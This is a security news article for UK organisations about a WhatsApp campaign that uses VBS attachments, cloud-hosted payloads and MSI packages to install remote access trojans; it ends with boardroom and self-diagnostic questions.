WhatsApp Malware Campaign Uses MSI Packages to Deploy Remote Access Trojans

A sophisticated malware campaign exploiting WhatsApp's ubiquity in UK business communications demonstrates how attackers now leverage trusted platforms and legitimate cloud infrastructure to bypass enterprise security controls. Microsoft Defender Experts documented this multi-stage attack beginning in late February 2026, revealing how cybercriminals weaponise social engineering alongside living-off-the-land techniques to establish persistent remote access.

The campaign deploys malicious Visual Basic Script files through WhatsApp messages, initiating an infection chain that uses renamed Windows utilities to blend into normal system activity whilst retrieving payloads from trusted cloud services including AWS, Tencent Cloud, and Backblaze B2. A living-off-the-land attack exploits legitimate system tools and trusted services to conduct malicious activities, making detection significantly more challenging for traditional security measures.

Key Facts:
- Campaign began in late February 2026, targeting organisations through WhatsApp social engineering
- Attackers use legitimate cloud services (AWS, Tencent Cloud, Backblaze B2) to host malicious payloads
- Malicious MSI packages establish persistence using renamed Windows utilities to evade detection
- Multi-stage infection chain combines social engineering with living-off-the-land techniques

How the Attack Exploits Business Communication Patterns

According to reporting from Microsoft's security blog, the campaign targets the intersection of personal and professional communication habits that define modern UK workplaces. WhatsApp's integration into business operations creates a trust environment that attackers exploit through carefully crafted messages containing VBS attachments. These scripts initiate a sophisticated payload delivery mechanism that leverages legitimate cloud infrastructure to avoid detection by URL filtering and reputation-based security controls.

The attack's sophistication lies in its abuse of standard business tools and services. Rather than relying on obviously malicious infrastructure, operators host command-and-control communications and payload delivery through services that organisations routinely whitelist for legitimate business functions. This approach exploits the supply chain trust model that continues to challenge UK enterprises by weaponising the very cloud services businesses depend upon for daily operations.

Why Traditional Endpoint Security Fails Against MSI Persistence

The campaign's use of Microsoft Installer packages represents a calculated evolution in persistence techniques. MSI files carry inherent legitimacy within Windows environments, often bypassing application whitelisting and endpoint detection controls that focus on executable files. The malware authors compound this advantage by renaming legitimate Windows utilities, creating a detection challenge that requires behavioural analysis rather than signature-based identification.

The NCSC's guidance on living-off-the-land attacks specifically warns that these techniques "exploit the legitimate functionality of operating systems and installed software to conduct malicious activities". This campaign exemplifies that warning by transforming routine system administration tools into components of a persistent backdoor infrastructure. Traditional antivirus solutions struggle with this approach because the individual components appear legitimate when examined in isolation.

What UK Mid-Market Organisations Must Address Immediately

This campaign exposes critical gaps in how UK organisations approach social engineering defence and endpoint monitoring. The attack succeeds because it exploits the convergence of personal communication platforms with business operations, a reality that most security policies fail to address comprehensively. Organisations must urgently evaluate whether their current controls can detect and respond to attacks that leverage legitimate system tools and trusted cloud services.

The timing is particularly concerning given the increasing sophistication of attacks targeting UK businesses. The campaign's operators demonstrate advanced understanding of enterprise security controls, designing their approach to exploit specific blind spots in detection capabilities. This level of sophistication suggests state-sponsored or professionally organised threat actors targeting UK commercial interests through channels that traditional security awareness training rarely addresses.

Boardroom Questions

• How effectively can our current endpoint detection capabilities identify malicious activity that uses legitimate Windows utilities and trusted cloud services?
• What controls do we have in place to prevent employees from executing attachments received through personal communication platforms like WhatsApp?
• How quickly could our security team detect and respond to an MSI-based persistence mechanism that blends into normal system administration activities?

Quick Diagnostic

• Can your endpoint detection solution identify when legitimate Windows utilities are renamed or used in unusual contexts?
• Do your security policies explicitly address the risks of file sharing through personal messaging platforms like WhatsApp?
• Would your security team detect an attacker using AWS or similar trusted cloud services to host command-and-control infrastructure?